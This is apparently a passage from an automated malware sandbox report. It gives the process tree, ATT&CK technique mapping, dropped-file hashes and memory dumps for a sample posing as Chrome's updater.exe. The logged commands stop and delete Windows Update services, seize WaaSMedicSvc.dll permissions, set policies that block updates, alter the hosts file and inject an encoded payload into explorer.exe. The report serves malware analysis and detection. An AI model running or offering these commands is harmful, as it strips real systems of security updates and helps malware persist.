"\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:700

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:628

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:1068

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:1588

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:912

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:2028

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:2044

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:1468

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies registry key
PID:1412

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:1988

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:1396

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1780

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1712

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:692

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:780

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1540

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1684

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:1200

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:1428

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:320

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:828

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:1808

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:1896

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:532

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
PID:1108

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1752

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:908

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1368

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1504

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "bmkeytcye"
4⤵
PID:1484

C:\Windows\explorer.exe
C:\Windows\explorer.exe sosudejrcxm1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8dyBC4RhMJQS3ZIS6W4m7i7iEJ7cohkojQOsRFzNMr56
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1496

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
7.1MB

MD5
2144e985a1fb8a18636dee1b1fcf096f

SHA1
fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a

SHA256
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895

SHA512
48d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
7.1MB

MD5
2144e985a1fb8a18636dee1b1fcf096f

SHA1
fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a

SHA256
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895

SHA512
48d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
2KB

MD5
c5227366b7a688ff23b01788718251aa

SHA1
9795262e79c832ba49c744fcd1b1794c0ffb5c6a

SHA256
789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48

SHA512
8b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe

Download Submit
\Program Files\Google\Chrome\updater.exe
Filesize
7.1MB

MD5
2144e985a1fb8a18636dee1b1fcf096f

SHA1
fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a

SHA256
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895

SHA512
48d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c

Download Submit
memory/268-108-0x0000000000000000-mapping.dmp

Download
memory/292-80-0x0000000000000000-mapping.dmp

Download
memory/304-102-0x0000000000000000-mapping.dmp

Download
memory/320-145-0x0000000000000000-mapping.dmp

Download
memory/320-81-0x0000000000000000-mapping.dmp

Download
memory/456-100-0x0000000000000000-mapping.dmp

Download
memory/532-83-0x0000000000000000-mapping.dmp

Download
memory/628-61-0x000007FEFC2C1000-0x000007FEFC2C3000-memory.dmp

Filesize
8KB

Download
memory/628-124-0x0000000000000000-mapping.dmp

Download
memory/628-60-0x000000001BAA0000-0x000000001BEBE000-memory.dmp

Filesize
4.1MB

Download
memory/628-59-0x00000000001C0000-0x00000000005DE000-memory.dmp

Filesize
4.1MB

Download
memory/636-77-0x0000000000000000-mapping.dmp

Download
memory/692-139-0x0000000000000000-mapping.dmp

Download
memory/700-120-0x0000000000000000-mapping.dmp

Download
memory/780-76-0x0000000000000000-mapping.dmp

Download
memory/780-140-0x0000000000000000-mapping.dmp

Download
memory/828-146-0x0000000000000000-mapping.dmp

Download
memory/828-82-0x0000000000000000-mapping.dmp

Download
memory/872-58-0x0000000077A40000-0x0000000077BE9000-memory.dmp

Filesize
1.7MB

Download
memory/872-55-0x0000000000400000-0x0000000001066000-memory.dmp

Filesize
12.4MB

Download
memory/872-91-0x0000000000000000-mapping.dmp

Download
memory/872-56-0x0000000077A40000-0x0000000077BE9000-memory.dmp

Filesize
1.7MB

Download
memory/872-54-0x0000000000400000-0x0000000001066000-memory.dmp

Filesize
12.4MB

Download
memory/872-57-0x0000000000400000-0x0000000001066000-memory.dmp

Filesize
12.4MB

Download
memory/908-125-0x0000000000000000-mapping.dmp

Download
memory/912-129-0x0000000000000000-mapping.dmp

Download
memory/972-113-0x0000000000000000-mapping.dmp

Download
memory/992-96-0x0000000001250000-0x0000000001EB6000-memory.dmp

Filesize
12.4MB

Download
memory/992-166-0x0000000001250000-0x0000000001EB6000-memory.dmp

Filesize
12.4MB

Download
memory/1048-78-0x0000000000000000-mapping.dmp

Download
memory/1060-97-0x0000000000000000-mapping.dmp

Download
memory/1068-126-0x0000000000000000-mapping.dmp

Download
memory/1068-88-0x0000000000000000-mapping.dmp

Download
memory/1108-121-0x0000000000000000-mapping.dmp

Download
memory/1168-79-0x0000000000000000-mapping.dmp

Download
memory/1200-143-0x0000000000000000-mapping.dmp

Download
memory/1208-84-0x0000000000000000-mapping.dmp

Download
memory/1232-73-0x0000000000000000-mapping.dmp

Download
memory/1368-127-0x0000000000000000-mapping.dmp

Download
memory/1380-68-0x0000000002644000-0x0000000002647000-memory.dmp

Filesize
12KB

Download
memory/1380-69-0x000000000264B000-0x000000000266A000-memory.dmp

Filesize
124KB

Download
memory/1380-62-0x0000000000000000-mapping.dmp

Download
memory/1380-67-0x000000001B730000-0x000000001BA2F000-memory.dmp

Filesize
3.0MB

Download
memory/1380-66-0x0000000002644000-0x0000000002647000-memory.dmp

Filesize
12KB

Download
memory/1380-64-0x000007FEEDB90000-0x000007FEEE5B3000-memory.dmp

Filesize
10.1MB

Download
memory/1380-65-0x000007FEED030000-0x000007FEEDB8D000-memory.dmp

Filesize
11.4MB

Download
memory/1388-104-0x0000000000000000-mapping.dmp

Download
memory/1392-72-0x0000000000000000-mapping.dmp

Download
memory/1392-149-0x0000000001170000-0x0000000001176000-memory.dmp

Filesize
24KB

Download
memory/1396-136-0x0000000000000000-mapping.dmp

Download
memory/1400-70-0x0000000000000000-mapping.dmp

Download
memory/1404-107-0x0000000000000000-mapping.dmp

Download
memory/1412-134-0x0000000000000000-mapping.dmp

Download
memory/1428-110-0x0000000000000000-mapping.dmp

Download
memory/1428-144-0x0000000000000000-mapping.dmp

Download
memory/1468-133-0x0000000000000000-mapping.dmp

Download
memory/1484-150-0x0000000000060000-0x0000000000067000-memory.dmp

Filesize
28KB

Download
memory/1484-152-0x0000000000060000-0x0000000000067000-memory.dmp

Filesize
28KB

Download
memory/1484-153-0x00000000001D0000-0x00000000001D6000-memory.dmp

Filesize
24KB

Download
memory/1496-167-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1496-160-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1496-172-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1496-171-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1496-169-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1496-175-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1496-165-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1496-164-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1496-162-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1496-173-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1496-158-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1496-156-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1496-155-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1496-177-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1496-178-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1496-179-0x0000000000070000-0x0000000000090000-memory.dmp

Filesize
128KB

Download
memory/1496-180-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1504-87-0x0000000000000000-mapping.dmp

Download
memory/1504-130-0x0000000000000000-mapping.dmp

Download
memory/1540-141-0x0000000000000000-mapping.dmp

Download
memory/1540-75-0x0000000000000000-mapping.dmp

Download
memory/1588-128-0x0000000000000000-mapping.dmp

Download
memory/1608-89-0x0000000000000000-mapping.dmp

Download
memory/1640-74-0x0000000000000000-mapping.dmp

Download
memory/1652-90-0x0000000000000000-mapping.dmp

Download
memory/1684-142-0x0000000000000000-mapping.dmp

Download
memory/1700-71-0x0000000000000000-mapping.dmp

Download
memory/1712-138-0x0000000000000000-mapping.dmp

Download
memory/1712-101-0x0000000000400000-0x0000000001066000-memory.dmp

Filesize
12.4MB

Download
memory/1712-103-0x0000000077A40000-0x0000000077BE9000-memory.dmp

Filesize
1.7MB

Download
memory/1712-93-0x0000000000000000-mapping.dmp

Download
memory/1712-99-0x0000000000400000-0x0000000001066000-memory.dmp

Filesize
12.4MB

Download
memory/1712-105-0x0000000000400000-0x0000000001066000-memory.dmp

Filesize
12.4MB

Download
memory/1712-106-0x0000000077A40000-0x0000000077BE9000-memory.dmp

Filesize
1.7MB

Download
memory/1744-95-0x0000000000000000-mapping.dmp

Download
memory/1752-123-0x0000000000000000-mapping.dmp

Download
memory/1780-137-0x0000000000000000-mapping.dmp

Download
memory/1808-147-0x0000000000000000-mapping.dmp

Download
memory/1896-148-0x0000000000000000-mapping.dmp

Download
memory/1900-86-0x0000000000000000-mapping.dmp

Download
memory/1908-119-0x0000000000C4B000-0x0000000000C6A000-memory.dmp

Filesize
124KB

Download
memory/1908-117-0x0000000000C44000-0x0000000000C47000-memory.dmp

Filesize
12KB

Download
memory/1908-118-0x0000000000C4B000-0x0000000000C6A000-memory.dmp

Filesize
124KB

Download
memory/1908-116-0x000007FEEC5E0000-0x000007FEED13D000-memory.dmp

Filesize
11.4MB

Download
memory/1908-115-0x000007FEED140000-0x000007FEEDB63000-memory.dmp

Filesize
10.1MB

Download
memory/1908-111-0x0000000000000000-mapping.dmp

Download
memory/1944-112-0x0000000000000000-mapping.dmp

Download
memory/1988-135-0x0000000000000000-mapping.dmp

Download
memory/2016-85-0x0000000000000000-mapping.dmp

Download
memory/2028-131-0x0000000000000000-mapping.dmp

Download
memory/2044-98-0x0000000000000000-mapping.dmp

Download
memory/2044-132-0x0000000000000000-mapping.dmp

Download